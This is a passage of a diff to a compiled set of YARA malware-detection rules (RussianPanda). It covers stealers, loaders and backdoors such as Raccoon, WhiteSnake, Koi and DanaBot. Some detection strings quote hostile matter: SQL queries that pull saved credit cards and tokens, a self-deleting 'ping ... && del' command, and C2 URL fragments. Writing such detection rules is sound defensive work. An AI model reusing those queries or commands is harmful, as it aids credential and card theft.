+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GoBitLoader/win_mal_GoBitLoader.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "f78b376713daf82aa2e0cbd6bf45f33d25530449fa05673c8a7c6b4c0dddca79"
+		logic_hash = "66951b290bef6a6c9eef4ea674472465dfe0ec5072dce21f48b58191f7ce90e3"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 79
+		tags = "FILE"
 
 	strings:
-		$s1 = "FileScannerRule"
-		$s2 = "MSObject"
-		$s3 = "MSValue"
-		$s4 = "GetBrowsers"
-		$s5 = "Biohazard"
+		$s1 = {6D 61 69 6E 2E 52 65 64 69 72 65 63 74 54 6F 50 61 79 6C 6F 61 64}
+		$s2 = {6D 61 69 6E 2E 48 6F 6C 6C 6F 77 50 72 6F 63 65 73 73}
+		$s3 = {6D 61 69 6E 2E 41 65 73 44 65 63 6F 64 65 2E 66 75 6E 63 31}
 
 	condition:
-		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Danabot
+rule RUSSIANPANDA_Mal_Asuka_Stealer : FILE
 {
 	meta:
-		description = "Detects DanaBot"
+		description = "Detects AsukaStealer"
 		author = "RussianPanda"
-		id = "804604d9-db3b-5678-ae0d-67f0e876c93e"
-		date = "2023-12-01"
-		modified = "2023-12-01"
+		id = "a718be5f-dc76-5610-9237-038a9719d7e5"
+		date = "2024-02-02"
+		modified = "2024-03-18"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/DanaBot/danabot_yara.yar#L1-L17"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AsukaStealer/mal_asuka_stealer.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "4968531f27fa1a8bc3fca536a04b75277adefc42addb9f1999c564510cbcb684"
+		logic_hash = "7974e0de821ddcafd4f00b27d587108f0d80f8a231dd0db4d2be4fa6ab44fef4"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$s1 = {55 8b ec 8a 45 08 34 4a 5d c2 04 00}
-		$s2 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 5C 00 53 00 65 00 61 00 4D 00 6F 00 6E 00 6B 00 65 00 79}
-		$s3 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 54 00 68 00 75 00 6E 00 64 00 65 00 72 00 62 00 69 00 72 00 64 00}
-		$s4 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 4F 00 52 00 4C 00 5C 00 57 00 69 00 6E 00 56 00 4E 00 43 00 33 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
-		$s5 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 45 00 78 00 63 00 69 00 74 00 65 00 5C 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4D 00 65 00 73 00 73 00 65 00 6E 00 67 00 65 00 72 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
-		$a = {44 45 4C 50 48 49 43 4C 41 53 53}
+		$s1 = {32 14 3E E8 F6 81 00 00}
+		$s2 = {00 58 00 2D 00 43 00 6F 00 6E 00 66 00 69 00 67}
+		$s3 = {58 00 2D 00 49 00 6E 00 66 00 6F}
 
 	condition:
-		3 of ( $s* ) and $a
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Prysmax_Stealer : FILE
+rule RUSSIANPANDA_Pikabot_1 : FILE
 {
 	meta:
-		description = "Detects Prysmax Stealer"
+		description = "Detects PikaBot"
 		author = "RussianPanda"
-		id = "97ab92b8-1771-5881-9cd1-d8ff76b8f380"
-		date = "2024-01-09"
-		modified = "2024-01-10"
-		reference = "https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Prysmax Stealer/prysmax_stealer.yar#L1-L21"
+		id = "e740b821-69cc-5053-9f90-439b4364656f"
+		date = "2024-01-02"
+		modified = "2024-01-02"
+		reference = "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PikaBot/Pikabot_1-2-2024.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "869eee7dd5209bdea98c248791b9ac911e3daabe6d440aa62aecefa43539a41c"
+		logic_hash = "f2dd26c23aba72c2b6b959fb411381b7d3a7466f94bf5259f57e96e44d3ee153"
 		score = 75
-		quality = 73
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = {23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23}
-		$s2 = {73 70 72 79 73 6D 61 78}
-		$s3 = {56 43 52 55 4E 54 49 4D 45 31 34 30 2E 64 6C 6C}
-		$s4 = {56 43 52 55 4E 54 49 4D 45 31 34 30 5F 31 2E 64 6C 6C}
-		$s5 = {4D 53 56 43 50 31 34 30 2E 64 6C 6C}
-		$s6 = {50 79 49 6E 73 74 61 6C 6C 65 72}
+		$s1 = {8A 04 11 30 02 42 83 EE 01 75 F5 5E C3}
+		$s2 = {C0 E9 02 C0 E0 04 [13] C0 E2 06 02 D0}
+		$s3 = {8D 53 BF 80 FA 19 0F B6 C3}
 
 	condition:
-		all of ( $s* ) and uint16( 0 ) == 0x5A4D and $a1 in ( 9600000 .. filesize ) and #a1 > 600 and filesize > 60MB and filesize < 200MB
+		uint16( 0 ) == 0x5A4D and 2 of ( $s* ) and filesize < 500KB
 }
-rule RUSSIANPANDA_Purelogs_Stealer_Initial_Dropper : FILE
+rule RUSSIANPANDA_Whitesnakestealer : FILE
 {
 	meta:
-		description = "Detects PureLogs Stealer Initial Payload"
+		description = "WhiteSnake Stealer"
 		author = "RussianPanda"
-		id = "c1e6a0a0-f8ed-5b78-bcae-55c1c1dfc9e4"
-		date = "2024-01-10"
-		modified = "2024-01-10"
-		reference = "https://russianpanda.com/2023/12/26/Pure-Logs-Stealer-Malware-Analysis/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Pure Logs Stealer/purelogs_stealer_initial_payload.yar#L1-L19"
+		id = "70b69aba-5096-59a6-bb0b-44d248aecc26"
+		date = "2023-07-04"
+		modified = "2023-12-11"
+		reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WhiteSnake-Stealer/WhiteSnake_rc4.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "0fe94c705b94f82163f952d0a29aac4689947a1d439bdc1847ee510c25cf2e40"
+		logic_hash = "24985a2c3b0d72858decd17cb2b8e485caa94c01ad72a014edc68ed4facfd71e"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {73 ?? 00 00 06 28 ?? 00 00 ?? 2A}
-		$s2 = {28 ?? 00 00 06 74 ?? 00 00 1B 28 ?? 00 00 0A 2A}
-		$s3 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 70 6F ?? 00 00 0A 2A}
-		$s4 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 ?? 20 00 01 00 00 14 14 14 6F ?? 00 00 ?? 26}
-		$s5 = {28 ?? 00 00 ?? 73 ?? 00 00 [29] 73 15 00 00 0A [22] 28 01 00 00 2B 28 02 00 00 2B}
+		$s1 = {73 68 69 74 2e 6a 70 67}
+		$s2 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C}
+		$s3 = "qemu" wide
+		$s4 = "vbox" wide
 
 	condition:
-		all of ( $s* ) and uint16( 0 ) == 0x5A4D and filesize < 1MB
+		all of ( $s* ) and filesize < 300KB
 }
-
-rule RUSSIANPANDA_Purelogs_Stealer_Core : FILE
+rule RUSSIANPANDA_Whitesnakestealer_1 : FILE
 {
 	meta:
-		description = "Detects Pure Logs Stealer Core Payload"
+		description = "Detects WhiteSnake Stealer XOR samples "
 		author = "RussianPanda"
-		id = "bda876c3-76ce-5e1e-8dd4-f06e8240fc11"
-		date = "2023-12-26"
-		modified = "2024-01-10"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Pure Logs Stealer/purelogs_stealer_core.yar#L3-L18"
+		id = "cfe168a6-cc2f-5cfe-985c-78b232dc2651"
+		date = "2023-07-04"
+		modified = "2023-12-11"
+		reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WhiteSnake-Stealer/WhiteSnake_xor.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "7388299ebcc70aeb86c46c29a787f790993a67148d9f3968def1109e45f69452"
+		logic_hash = "0bd0e250b8598be297296ecf6644d3bf649e3dc4598438325a0913afed04c819"
 		score = 75
 		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {7E 58 00 00 0A [15] 28 20 00 00 0A 18 6F 0A 02 00 0A 0B}
-		$s2 = {50 6C 67 43 6F 72 65}
-		$s3 = {7E 64 01 00 0A 28 65 01 00 0A}
+		$s1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
+		$s2 = {61 6e 61 6c 2e 6a 70 67}
 
 	condition:
-		all of ( $s* ) and filesize < 5MB and pe.imports ( "mscoree.dll" )
+		all of ( $s* ) and filesize < 600KB
 }
-rule RUSSIANPANDA_Ghostgambit : FILE
+rule RUSSIANPANDA_Win_Mal_Koistealer_PS
 {
 	meta:
-		description = "Detects GhostGambit dropper"
+		description = "Detects KoiStealer PowerShell script"
 		author = "RussianPanda"
-		id = "0348b9fa-59be-5f30-8ebc-f1e87cf98b07"
-		date = "2024-07-09"
-		modified = "2024-07-09"
+		id = "6dfdb39c-1b6a-5969-9c2d-e09869af6e0f"
+		date = "2024-04-04"
+		modified = "2024-04-04"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GhostGambit/GhostGambit.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Koi/win_mal_KoiStealer_PS.yar#L1-L12"
 		license_url = "N/A"
-		hash = "2b16c68d9bafbd2ecf3634d991d7c794"
-		logic_hash = "419efbea3c347d0ec9365c0c21cccb6f229f8c42d22a2bcfdf14854e7f83aea1"
+		hash = "4f55be0b55ec67dfda42b88e9c743a2a"
+		logic_hash = "8a60a1d770eb4b5048762ddfd4657fdf7a430b09eb454ae5a5bb3103460907db"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "/code32" ascii wide
-		$s2 = "/reg32" ascii wide
-		$s3 = "ZhuDongFangYu.exe" ascii wide
-		$s4 = "/c ping -n 4 127.0.0.1 > nul && del" ascii wide
+		$s1 = "index.php?id=$guid&subid="
+		$s2 = "$config"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* )
 }
-rule RUSSIANPANDA_Win_Mal_Glorysprout_Stealer : FILE
+rule RUSSIANPANDA_Win_Mal_Koi_Loader_Decrypted : FILE
 {
 	meta:
-		description = "Detects GlorySprout Stealer"
+		description = "Detects decrypted Koi Loader"
 		author = "RussianPanda"
-		id = "44c50f20-479e-5960-9ab9-97b9a17d7cbf"
-		date = "2024-03-16"
-		modified = "2024-03-16"
+		id = "71de93d3-5c9f-5994-a54d-d4455d500280"
+		date = "2024-04-04"
+		modified = "2024-04-04"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GlorySprout/win_mal_GlorySprout_Stealer.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Koi/win_mal_Koi_loader_decrypted.yar#L1-L12"
 		license_url = "N/A"
-		hash = "8996c252fc41b7ec0ec73ce814e84136be6efef898822146c25af2330f4fd04a"
-		logic_hash = "c843f7924e69c1b9fc3676178aa630319fe25605deddcd73c4905c51cc97d7eb"
+		hash = "1901593e0299930d46b963866f33a93b"
+		logic_hash = "f73ada7185ff109afe1e186a0fb7b4420b3d0e04c93c7c5423243db97eb34e49"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {25 0F 00 00 80 79 05 48 83 C8 F0 40}
-		$s2 = {8B 82 A4 00 00 00 8B F9 89 06 8D 4E 0C 8B 82 A8 00 00 00 89 46 04 0F B7 92 AC 00 00 00 89 56 08}
-		$s3 = {0F B6 06 C1 E7 04 03 F8 8B C7 25 00 00 00 F0 74 0B C1 E8 18}
+		$s1 = {73 00 64 00 32 00 2E 00 70 00 73 00 31 00}
+		$s2 = {25 00 74 00 65 00 6D 00 70 00 25 00 5C 00 25 00 70 00 61 00 74 00 68 00 73 00 25}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s1 > 100
+		uint16( 0 ) == 0x5A4D and all of ( $s* )
 }
-rule RUSSIANPANDA_Mal_Msedge_Dll_Virusloader : FILE
+rule RUSSIANPANDA_Win_Mal_Koi_Loader : FILE
 {
 	meta:
-		description = "Detects malicious msedge.dll file"
+		description = "Detects Koi Loader"
 		author = "RussianPanda"
-		id = "7139ee30-de9a-5ef0-a96f-2ab9c239c6ff"
-		date = "2024-01-19"
-		modified = "2024-01-19"
-		reference = "https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/virusloader/mal_msedge_dll_virusloader.yar#L1-L16"
+		id = "a608558d-97c8-5161-a6eb-29fd420458a8"
+		date = "2024-04-04"
+		modified = "2024-04-04"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Koi/win_mal_Koi_loader.yar#L1-L14"
 		license_url = "N/A"
-		hash = "ab2e3b07170ef1516af3af0d03388868"
-		logic_hash = "659fd5fa3121fec5bf4cceb6f3dea95bf4cbcde7441d6f11c35288d8ad75a803"
+		hash = "47e208687c2fb40bdbaa17e368aaa1bd"
+		logic_hash = "4f909865c6d274804c3fa7f66822d7bea71bb93e7c6a422ebaf220df056ac095"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {C6 85 ?? FE FF FF ?? C6}
-		$s2 = {C7 85 ?? FD FF FF}
-		$s3 = {BF 60 01 00 00 [18] 30 04 39 41}
+		$s1 = {27 11 68 05}
+		$s2 = {15 B1 B3 09}
+		$s3 = {B5 96 AA 0D}
+		$s4 = {74 [0-10] C1 E9 18}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* ) and #s1 > 30 and #s2 > 30 and filesize < 300KB
+		uint16( 0 ) == 0x5A4D and all of ( $s* )
 }
-
-rule RUSSIANPANDA_Swaetrat
+rule RUSSIANPANDA_Darkvnc : FILE
 {
 	meta:
-		description = "Detects SwaetRAT"
+		description = "Detects DarkVNC"
 		author = "RussianPanda"
-		id = "e5238ae4-7ae3-505c-a3fd-ecf6be608fac"
-		date = "2023-11-27"
-		modified = "2023-11-27"
+		id = "dbc86ac8-5ea3-59a7-b3ab-68c603165720"
+		date = "2024-01-15"
+		modified = "2024-01-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SwaetRAT/swaetrat.yar#L3-L19"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/DarkVNC/darkvnc.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "4dc1107a34d678c3fa0939fab7986fe744ac246400823d08b1ab6db0942821da"
+		hash = "3c74dccd06605bcf527ffc27b3122959"
+		logic_hash = "1dd1246e0b22181706433f0cff9b231017e747d8faaa2db4cb9adefeab492ab7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s2 = "Pong"
-		$s3 = "ReadData"
-		$s4 = "DeskDrop" wide
-		$s5 = "OfflineGet" wide
+		$s1 = {66 89 84 24 ?? 00 00 00 B8 ?? 00 00 00}
+		$s2 = {66 31 14 41 48}
+		$s3 = "VncStopServer"
+		$s4 = "VncStartServer"
 
 	condition:
-		all of ( $s* ) and pe.imports ( "mscoree.dll" )
+		uint16( 0 ) == 0x5A4D and 3 of them and filesize < 700KB
 }
-rule RUSSIANPANDA_Mal_Nitrogen : FILE
+rule RUSSIANPANDA_Atomic_Stealer : FILE
 {
 	meta:
-		description = "Detects Nitrogen campaign"
+		description = "Detects Atomic Stealer targering MacOS"
 		author = "RussianPanda"
-		id = "9d591f87-47ec-54ea-b0ae-26a0542733a0"
-		date = "2024-02-04"
-		modified = "2024-02-04"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Nitrogen/mal_nitrogen.yar#L1-L15"
+		id = "259c5c33-0164-568f-aec4-4fe0a2c6d015"
+		date = "2024-01-13"
+		modified = "2024-01-17"
+		reference = "https://www.bleepingcomputer.com/news/security/macos-info-stealers-quickly-evolve-to-evade-xprotect-detection/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AtomicStealer/Atomic_Stealer.yar#L1-L27"
 		license_url = "N/A"
-		logic_hash = "642d5a16c7fb217a297bba683221de474eb028ac48ec8f52be897eaa056acb9b"
+		hash = "dd8aa38c7f06cb1c12a4d2c0927b6107"
+		logic_hash = "7601e508aeccba943b54e675212993920c984271f655e68c19efaf6d12cfebd5"
 		score = 75
-		quality = 79
+		quality = 58
 		tags = "FILE"
 
 	strings:
-		$s1 = {63 7C 77 7B F2 6B 6F C5}
-		$s2 = {52 09 6A D5 30 36 A5 38}
-		$s3 = {6F 72 69 67 69 6E 61 6C 5F 69 6E 73 74 61 6C 6C}
-		$s4 = {43 3A 5C 55 73 65 72 73 5C 50 75 62 6C 69 63 5C 44 6F 77 6E 6C 6F 61 64}
-		$s5 = {25 00 43 00 55 00 52 00 52 00 45 00 4E 00 54 00 5F 00 44 00 45 00 52 00 45 00 43 00 54 00 4F 00 52 00 59 00 25}
-		$s6 = {4E 69 74 72 6F 67 65 6E 54 61 72 67 65 74}
+		$s1 = {8B 09 83 C1 (01|02|04|05|03) 39 C8 0F 85 38 00 00 00 48 8B 85}
+		$s2 = {C7 40 04 00 00 00 00 C6 40 08 00 C6 40 09 00}
+		$t1 = {80 75 D?}
+		$t2 = {0F 57 05 ?? 1B 01 00}
+		$t3 = {8A 06 34 DE 88 07 8A 46 01 34 DF 88 47 01}
+		$c1 = {28 ?? 40 39}
+		$c2 = {64 65 73 6B 77 61 6C 6C 65 74 73}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and all of ( $s* ) and #s1 > 60 and #s2 > 100 or ( all of ( $t* ) and #t1 > 10 and #t2 > 5 ) or ( #c1 > 200 and $c2 )
 }
-rule RUSSIANPANDA_Win_Mal_Rustydropper : FILE
+
+rule RUSSIANPANDA_Andeloader
 {
 	meta:
-		description = "Detects RustyDropper"
+		description = "Detects Ande Loader"
 		author = "RussianPanda"
-		id = "9f217080-81e0-547a-9336-cf8ac2fadf36"
-		date = "2024-03-01"
-		modified = "2024-03-01"
+		id = "c08d63b6-9fef-505d-9611-9dd0403c7c7c"
+		date = "2023-12-11"
+		modified = "2023-12-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/RustyDropper/win_mal_RustyDropper.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AndeLoader/ande_loader.yar#L3-L18"
 		license_url = "N/A"
-		hash = "a3a5e7011335a2284e2d4f73fd464ff129f0c9276878a054c1932bc50608584b"
-		logic_hash = "d0c76bcd1af63cc1b1fbabc3fa33e6caafd7d9c7c3780a94a1ed37eadef655d7"
+		logic_hash = "cd55153077e5cfbd84cbe5b062dbd842def245417acfea4ed6c2b1db702dcc81"
 		score = 75
-		quality = 81
+		quality = 83
+		tags = ""
+
+	strings:
+		$s1 = {59 61 6E 6F 41 74 74 72 69 62 75 74 65}
+		$s2 = "CreateShortcut" wide
+		$s3 = ".vbs" wide
+
+	condition:
+		3 of ( $s* ) and pe.imports ( "mscoree.dll" )
+}
+
+rule RUSSIANPANDA_Workersdevbackdoor : FILE
+{
+	meta:
+		description = "Detects WorkersDevBackdoor"
+		author = "RussianPanda"
+		id = "725e0924-c108-5927-8d27-e4bc5b284883"
+		date = "2023-12-15"
+		modified = "2024-01-05"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WorkersDevBackdoor/WorkDevBackdoor.yar#L3-L20"
+		license_url = "N/A"
+		logic_hash = "f92ad9dc657d87a47e539ea2ee896f9b86bb95e51a890a838c6e6b0efa5deb7d"
+		score = 75
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {47 3a 5c 52 55 53 54 5f 44 52 4f 50 50 45 52 5f 45 58 45 5f 50 41 59 4c 4f 41 44 5c 44 52 4f 50 50 45 52 5f 4d 41 49 4e 5c}
-		$s2 = {46 45 41 54 55 52 45 5f 42 52 4f 57 53 45 52 5f 45 4d 55 4c 41 54 49 4f 4e}
+		$s1 = {72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 20 00 7B 00 30 00 7D 00 20 00 7B 00 31 00 7D}
+		$s2 = {72 FB 00 00 70 72 13 01 00 70 28 20 00 00 0A 72 2D 01 00 70}
+		$s3 = {55 00 53 00 45 00 52 00 44 00 4F 00 4D 00 41 00 49 00 4E}
+		$s4 = {43 00 4F 00 4D 00 50 00 55 00 54 00 45 00 52 00 4E 00 41 00 4D 00 45}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		3 of ( $s* ) and pe.imports ( "mscoree.dll" ) and filesize < 2MB
 }
-rule RUSSIANPANDA_Truecrypt_Crypter : FILE
+rule RUSSIANPANDA_Workersdevbackdoor_PS : FILE
 {
 	meta:
-		description = "Detects TrueCrypt crypter"
+		description = "Detects WorkersDevBackdoor PowerShell script"
 		author = "RussianPanda"
-		id = "3ecf9c2f-6205-5e55-83a5-2b4e3ba89f07"
-		date = "2024-01-06"
-		modified = "2024-01-06"
+		id = "d2b526c1-a9f5-57de-818c-99b02e778a0d"
+		date = "2023-12-15"
+		modified = "2023-12-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/TrueCrypt/truecrypt_crypter.yar#L1-L27"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WorkersDevBackdoor/WorkersDevBackdoor_PS.yar#L1-L18"
 		license_url = "N/A"
-		hash = "167637397fb45ea19bafcf208d8f27dceec82caa7ab19d40ecdb08eb1b7d4f60"
-		logic_hash = "68612c68053e9fb81d9616c04b04ac2e2cb685f3b7ed71f8b31e8f22e3a539e7"
+		logic_hash = "c71eed8fd7a44f3018150cc6ef55d10779093ed8e4c77fd9babcf9b1b9fadfda"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1_crpt1 = {77 69 6E 65 5F 67 65 74}
-		$s2_crpt1 = {49 3B 66 10 76}
-		$s2_crpt2 = {3B 55 48 89 E5 48 83 EC 10 90 8B 0D [22] E8 [3] FF}
-		$s3_crpt1 = {49 3B 66 10 76 43}
-		$s3_crpt2 = {55 48 89 E5 48 83 EC 10 [5] E8 [4] 48 85 FF 75 18}
-		$s4_crpt1 = {40 C0 EE 04 [16] 48 83}
-		$s4_crpt2 = {FA 20 [0-22] 48 83 FE 20}
-		$a_crpt = {61 2E 6F 75 74 2E 65 78 65 00 5F 63 67}
-		$s_crpt = {6F 5F 64 75 6D 6D 79 5F 65 78 70 6F 72 74}
+		$s1 = "sleep" wide
+		$s2 = "convertto-securestring" wide
+		$s3 = "System.Drawing.dll" wide
+		$s4 = "System.Web.Extensions.dll" wide
+		$s5 = "System.Windows.Forms.dll" wide
+		$s6 = "CSharp" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $s1_crpt1 and $s2_crpt1 and $s2_crpt2 and $s3_crpt1 and $s3_crpt2 and $s4_crpt1 and $s4_crpt2 and $a_crpt and $s_crpt and filesize < 7MB
+		all of ( $s* ) and filesize < 200KB
 }
 rule RUSSIANPANDA_Mal_Botnetfenix_Payload : FILE
 {
@@ -159418,137 +160029,242 @@ rule RUSSIANPANDA_Mal_Fenixbotnet_Jse
 	condition:
 		all of ( $s* )
 }
-rule RUSSIANPANDA_Easycrypter : FILE
+rule RUSSIANPANDA_Raccoonstealer : FILE
 {
 	meta:
-		description = "Detects EasyCrypter"
+		description = "Detects Raccoon Stealer v2.3.1.1"
 		author = "RussianPanda"
-		id = "73b01a6c-dcd1-502e-a431-daf82ab3ed50"
-		date = "2024-01-05"
-		modified = "2024-01-05"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/EasyCrypter/easycrypter.yar#L1-L16"
+		id = "29f28cd5-370b-5831-8b71-a253f468f7e4"
+		date = "2024-01-08"
+		modified = "2024-01-08"
+		reference = "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/RaccoonStealer_v2/raccoonstealer_v2.3.1.1.yar#L1-L20"
 		license_url = "N/A"
-		hash = "60063c99fda3b6c5c839ec1c310b03e8f9c7c8823f2eb7bf75e22c6d738ffa8f"
-		logic_hash = "761ed4629150453009b76d9c2ad251754009b464550b92dab3395fa30422f6ef"
+		hash = "c6d0d98dd43822fe12a1d785df4e391db3c92846b0473b54762fbb929de6f5cb"
+		logic_hash = "ee2b39c1c2068b97e63a03330a2f9e2f12e53aaf9cfffb274acde2372a11fe45"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {F6 17 [16-20] 80 2F 36 [16-20] 80 07 87}
-		$s2 = {81 38 50 45 00 00 [20-22] 8B 88 A0 00 00 00 [2-4] 8B 80 A4 00 00 00 [5-7] 8B 40 50 [50-56] 89 0C 24 89 44 24 04 C7 44 24 08 00 30 00 00 C7 44 24 0C 04 00 00 00 FF 15 [3] 00}
+		$s1 = {8B 0D [2] 41 00 A3 [3] 00}
+		$s2 = "MachineGuid"
+		$s3 = "SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards"
+		$s4 = "SELECT service, encrypted_token FROM token_service"
+		$s5 = "&configId="
+		$s6 = "machineId="
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $s1 and $s2
+		all of ( $s* ) and #s1 > 10 and uint16( 0 ) == 0x5A4D and filesize < 5MB
 }
-rule RUSSIANPANDA_Win_Mal_Stealc_V2 : FILE
+rule RUSSIANPANDA_Raccoonstealerv2 : FILE
 {
 	meta:
-		description = "Detects StealC v2"
+		description = "Detects the latest unpacked/unobfuscated build 2.1.0-4"
 		author = "RussianPanda"
-		id = "052f4556-ddba-5187-8dcb-138f02bc4c36"
-		date = "2025-04-10"
-		modified = "2025-04-10"
+		id = "eda6216a-219b-5f60-8084-4c0c240a4cb4"
+		date = "2023-04-17"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/StealC/win_mal_StealC_v2.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/RaccoonStealer_v2/raccoonstealerv2_2.1.0-4_build.yar#L1-L14"
 		license_url = "N/A"
